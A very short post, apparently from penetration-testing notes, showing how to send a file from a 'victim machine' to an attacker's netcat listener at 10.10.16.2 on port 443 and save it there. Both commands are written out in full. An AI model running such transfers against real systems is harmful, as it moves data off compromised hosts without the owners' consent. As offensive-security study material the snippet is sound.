Netcat File Transfer
Post

Netcat File Transfer

Transfer File

Output the exit of the file towards the netcat listener on the victim machine:

1
type .\out.txt | .\nc.exe -nv 10.10.16.2 443

Then redirect the traffic towards the destination file:

1
nc -nlvp 443 > out.txt